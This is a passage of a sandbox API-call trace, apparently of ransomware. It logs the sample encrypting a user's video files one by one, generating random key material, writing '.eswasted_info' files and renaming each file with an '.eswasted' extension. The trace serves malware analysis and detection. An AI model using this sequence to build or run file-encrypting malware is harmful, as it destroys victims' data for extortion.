phProv=0x130fe84*=0x70f058) returned 1 [0080.520] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.520] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.520] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.521] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.521] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.529] SetEndOfFile (hFile=0x108) returned 1 [0080.578] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.578] CloseHandle (hObject=0x108) returned 1 [0080.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.584] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.585] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.585] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.585] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\56MSIW99M-.flv") returned 106 [0080.585] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2de) returned 0x1312110 [0080.585] lstrcpyW (in: lpString1=0x13121e4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.585] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.585] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.586] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.586] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\56MSIW99M-.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\56msiw99m-.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.587] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.588] SetEndOfFile (hFile=0x108) returned 1 [0080.588] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.588] lstrcpyW (in: lpString1=0x13121e4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\56MSIW99M-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\56msiw99m-.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\56MSIW99M-.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\56msiw99m-.flv.eswasted")) returned 1 [0080.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\56MSIW99M-.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\56msiw99m-.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.589] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.591] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.591] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.592] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.592] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.592] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.592] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.601] SetEndOfFile (hFile=0x108) returned 1 [0080.604] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.604] CloseHandle (hObject=0x108) returned 1 [0080.607] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0080.608] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.608] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.608] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\0qP03th9f15adUkhyJX.swf") returned 127 [0080.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x308) returned 0x1312110 [0080.609] lstrcpyW (in: lpString1=0x131220e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.609] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.609] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.609] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\0qP03th9f15adUkhyJX.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\0qp03th9f15adukhyjx.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.610] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.645] SetEndOfFile (hFile=0x108) returned 1 [0080.645] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.645] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.645] lstrcpyW (in: lpString1=0x131220e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\0qP03th9f15adUkhyJX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\0qp03th9f15adukhyjx.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\0qP03th9f15adUkhyJX.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\0qp03th9f15adukhyjx.swf.eswasted")) returned 1 [0080.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\0qP03th9f15adUkhyJX.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\0qp03th9f15adukhyjx.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.650] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.651] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.652] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.652] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.652] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.653] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.653] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.661] SetEndOfFile (hFile=0x108) returned 1 [0080.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.663] CloseHandle (hObject=0x108) returned 1 [0080.669] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0080.669] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.670] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.670] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\DX45numeHFBpcRrQ.avi") returned 136 [0080.670] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x31a) returned 0x1312110 [0080.670] lstrcpyW (in: lpString1=0x1312220, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.670] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.670] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.671] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.671] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\DX45numeHFBpcRrQ.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\dx45numehfbpcrrq.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.672] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.673] SetEndOfFile (hFile=0x108) returned 1 [0080.673] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.673] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.673] lstrcpyW (in: lpString1=0x1312220, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\DX45numeHFBpcRrQ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\dx45numehfbpcrrq.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\DX45numeHFBpcRrQ.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\dx45numehfbpcrrq.avi.eswasted")) returned 1 [0080.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\DX45numeHFBpcRrQ.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\dx45numehfbpcrrq.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.674] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0080.677] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.678] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.678] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.678] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.678] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.678] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.687] SetEndOfFile (hFile=0x108) returned 1 [0080.736] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.736] CloseHandle (hObject=0x108) returned 1 [0080.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0080.738] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.739] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.739] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\QJRaE.mkv") returned 125 [0080.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x304) returned 0x738d10 [0080.739] lstrcpyW (in: lpString1=0x738e0a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.739] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.740] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.740] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\QJRaE.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\qjrae.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.740] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.741] SetEndOfFile (hFile=0x108) returned 1 [0080.742] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.742] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.742] lstrcpyW (in: lpString1=0x738e0a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\QJRaE.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\qjrae.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\QJRaE.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\qjrae.mkv.eswasted")) returned 1 [0080.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\QJRaE.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\qjrae.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.744] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0080.746] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.746] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.746] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.746] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.747] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.747] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.756] SetEndOfFile (hFile=0x108) returned 1 [0080.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.758] CloseHandle (hObject=0x108) returned 1 [0080.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.760] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.761] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.761] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\USH_SLD8akrB.mkv") returned 132 [0080.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x312) returned 0x738d10 [0080.761] lstrcpyW (in: lpString1=0x738e18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.761] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.762] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.762] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\USH_SLD8akrB.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\ush_sld8akrb.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.763] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.764] SetEndOfFile (hFile=0x108) returned 1 [0080.764] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.764] lstrcpyW (in: lpString1=0x738e18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\USH_SLD8akrB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\ush_sld8akrb.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\USH_SLD8akrB.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\ush_sld8akrb.mkv.eswasted")) returned 1 [0080.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\AA9ZZAOYsRO\\USH_SLD8akrB.mkv.eswasted" (normalized: 